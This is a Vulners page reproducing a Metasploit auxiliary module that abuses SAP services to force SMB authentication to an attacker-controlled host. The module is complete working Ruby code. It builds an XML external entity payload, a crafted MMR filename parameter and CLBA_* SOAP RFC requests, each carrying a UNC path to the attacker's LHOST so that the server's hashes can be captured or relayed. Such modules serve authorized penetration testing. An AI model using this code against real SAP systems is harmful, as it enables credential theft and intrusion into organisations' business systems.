Lucene search
+L

SAP SMB Relay Abuse

🗓️ 15 May 2013 01:52:33Reported by Alexey Tyurin, nmonkeeType 
metasploit
 metasploit
🔗 www.rapid7.com👁 50 Views

This module exploits several SMB Relay abuse through different SAP services and functions including a UNC Path which will be accessed by the SAP system. The attack can be executed by specially crafted requests

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

##
# This module is based on, inspired by, or is a port of a plugin available in
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
# http://www.onapsis.com/research-free-solutions.php.
# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
# in producing the Metasploit modules and was happy to share his knowledge and
# experience - a very cool guy.
#
# The following guys from ERP-SCAN deserve credit for their contributions -
# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
# Dmitry Evdokimov.
#
# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
# who have Beta tested the modules and provided excellent feedback. Some people
# just seem to enjoy hacking SAP :)
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name' => 'SAP SMB Relay Abuse',
      'Description' => %q{
          This module exploits provides several SMB Relay abuse through different SAP
        services and functions. The attack is done through specially crafted requests
        including a UNC Path which will be accessing by the SAP system while trying to
        process the request.  In order to get the hashes the auxiliary/server/capture/smb
        module can be used.
      },
      'References' => [
        [ 'URL', 'http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity/' ],
        [ 'URL', 'https://launchpad.support.sap.com/#/notes/1597066' ]
      ],
      'Author' =>
        [
          'Alexey Tyurin', # xmla service SMB relay abuse discovery
          'nmonkee' # Metasploit module
        ],
      'License' => MSF_LICENSE
    )

    register_options([
      Opt::RPORT(8000),
      OptString.new('CLIENT',   [true,  'SAP client', '001']),
      OptString.new('HttpUsername', [false, 'Username (Ex SAP*)']),
      OptString.new('HttpPassword', [false, 'Password (Ex 06071992)']),
      OptAddressLocal.new('LHOST',   [true,  'Server IP or hostname of the SMB Capture system']),
      OptEnum.new('ABUSE',      [true,  'SMB Relay abuse to use', "MMR",
        [
          "MMR",
          "BW",
          "CLBA_CLASSIF_FILE_REMOTE_HOST",
          "CLBA_UPDATE_FILE_REMOTE_HOST"
        ]
      ]),
    ])

  end

  def valid_credentials?
    if datastore['HttpUsername'].blank?
      return false
    end

    if datastore['HttpPassword'].blank?
      return false
    end
    return true
  end

  def run_xmla

    if not valid_credentials?
      vprint_error("#{rhost}:#{rport} - Credentials needed in order to abuse the SAP BW service")
      return
    end

    smb_uri = "\\\\#{datastore['LHOST']}\\#{Rex::Text.rand_text_alpha_lower(7)}.#{Rex::Text.rand_text_alpha_lower(3)}"
    data = '<?xml version="1.0" encoding="utf-8" ?>'
    data << '<!DOCTYPE root ['
    data << '<!ENTITY foo SYSTEM "' + smb_uri + '">'
    data << ']>'
    data << '<in>&foo;</in>'

    begin
      print_status("#{rhost}:#{rport} - Sending request for #{smb_uri}")
      res = send_request_raw({
        'uri' => '/sap/bw/xml/soap/xmla?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
        'method' => 'POST',
        'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
        'data' => data,
        'ctype' => 'text/xml; charset=UTF-8',
        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT']
      })
      if res and res.code == 200 and res.body =~ /XML for Analysis Provider/ and res.body =~ /Request transfered is not a valid XML/
        print_good("#{rhost}:#{rport} - SMB Relay looks successful, check your SMB capture machine")
      else
        vprint_status("#{rhost}:#{rport} - Response: #{res.code} - #{res.message}") if res
      end
    rescue ::Rex::ConnectionError
      print_error("#{rhost}:#{rport} - Unable to connect")
      return
    end
  end

  def run_mmr
    begin
      smb_uri = "\\\\#{datastore['LHOST']}\\#{Rex::Text.rand_text_alpha_lower(7)}.#{Rex::Text.rand_text_alpha_lower(3)}"

      if datastore['HttpUsername'].empty?
        vprint_status("#{rhost}:#{rport} - Sending unauthenticated request for #{smb_uri}")
        res = send_request_cgi({
          'uri' => '/mmr/MMR',
          'method' => 'HEAD',
          'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
          'ctype' => 'text/xml; charset=UTF-8',
          'vars_get' => {
            'sap-client' => datastore['CLIENT'],
            'sap-language' => 'EN',
            'filename' => smb_uri
          }
        })

      else
        vprint_status("#{rhost}:#{rport} - Sending authenticated request for #{smb_uri}")
        res = send_request_cgi({
          'uri' => '/mmr/MMR',
          'method' => 'GET',
          'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
          'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
          'ctype' => 'text/xml; charset=UTF-8',
          'vars_get' => {
            'sap-client' => datastore['CLIENT'],
            'sap-language' => 'EN',
            'filename' => smb_uri
          }
        })
      end

      if res
        vprint_status("#{rhost}:#{rport} - Response: #{res.code} - #{res.message}")
      end
    rescue ::Rex::ConnectionError
      print_error("#{rhost}:#{rport} - Unable to connect")
      return
    end
  end

  def send_soap_rfc_request(data, smb_uri)
    if not valid_credentials?
      vprint_error("#{rhost}:#{rport} - Credentials needed in order to abuse the SAP SOAP RFC service")
      return
    end

    begin
      vprint_status("#{rhost}:#{rport} - Sending request for #{smb_uri}")
      res = send_request_cgi({
        'uri' => '/sap/bc/soap/rfc',
        'method' => 'POST',
        'data' => data,
        'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
        'ctype' => 'text/xml; charset=UTF-8',
        'headers' => {
          'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
        },
        'vars_get' => {
          'sap-client' => datastore['CLIENT'],
          'sap-language' => 'EN'
        }
      })
      if res and res.code == 500 and res.body =~ /OPEN_FAILURE/
        print_good("#{rhost}:#{rport} - SMB Relay looks successful, check your SMB capture machine")
      else
        vprint_status("#{rhost}:#{rport} - Response: #{res.code} - #{res.message}") if res
      end
    rescue ::Rex::ConnectionError
      print_error("#{rhost}:#{rport} - Unable to connect")
      return
    end
  end

  def run_clba_classif_file_remote
    smb_uri = "\\\\#{datastore['LHOST']}\\#{Rex::Text.rand_text_alpha_lower(7)}.#{Rex::Text.rand_text_alpha_lower(3)}"

    data = '<?xml version="1.0" encoding="utf-8" ?>'
    data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" '
    data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" '
    data << 'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">'
    data << '<SOAP-ENV:Header/>'
    data << '<SOAP-ENV:Body>'
    data << '<CLBA_CLASSIF_FILE_REMOTE_HOST xmlns="urn:sap-com:document:sap:rfc:functions">'
    data << '<CLASSIF_FILE>'
    data << '<item>'
    data << '<ZEILE>a</ZEILE>'
    data << '</item>'
    data << '</CLASSIF_FILE>'
    data << '<FILE_NAME>' + smb_uri + '</FILE_NAME>'
    data << '</CLBA_CLASSIF_FILE_REMOTE_HOST>'
    data << '</SOAP-ENV:Body>'
    data << '</SOAP-ENV:Envelope>'
    send_soap_rfc_request(data, smb_uri)
  end

  def run_clba_update_file_remote
    smb_uri = "\\\\#{datastore['LHOST']}\\#{Rex::Text.rand_text_alpha_lower(7)}.#{Rex::Text.rand_text_alpha_lower(3)}"

    data = '<?xml version="1.0" encoding="utf-8" ?>'
    data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" '
    data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" '
    data << 'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">'
    data << '<SOAP-ENV:Header/>'
    data << '<SOAP-ENV:Body>'
    data << '<CLBA_UPDATE_FILE_REMOTE_HOST xmlns="urn:sap-com:document:sap:rfc:functions">'
    data << '<DATA_TAB>'
    data << '<item>'
    data << '<TABNAME>a</TABNAME>'
    data << '<NUMMER>0</NUMMER>'
    data << '<TEXT>a</TEXT>'
    data << '<COLOR>a</COLOR>'
    data << '<DATA>a</DATA>'
    data << '</item>'
    data << '</DATA_TAB>'
    data << '<FILE_NAME>' + smb_uri + '</FILE_NAME>'
    data << '</CLBA_UPDATE_FILE_REMOTE_HOST>'
    data << '</SOAP-ENV:Body>'
    data << '</SOAP-ENV:Envelope>'
    send_soap_rfc_request(data, smb_uri)
  end

  def run_host(ip)
    case datastore['ABUSE']
      when "MMR"
        run_mmr
      when "BW"
        run_xmla
      when "CLBA_CLASSIF_FILE_REMOTE_HOST"
        run_clba_classif_file_remote
      when "CLBA_UPDATE_FILE_REMOTE_HOST"
        run_clba_update_file_remote
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation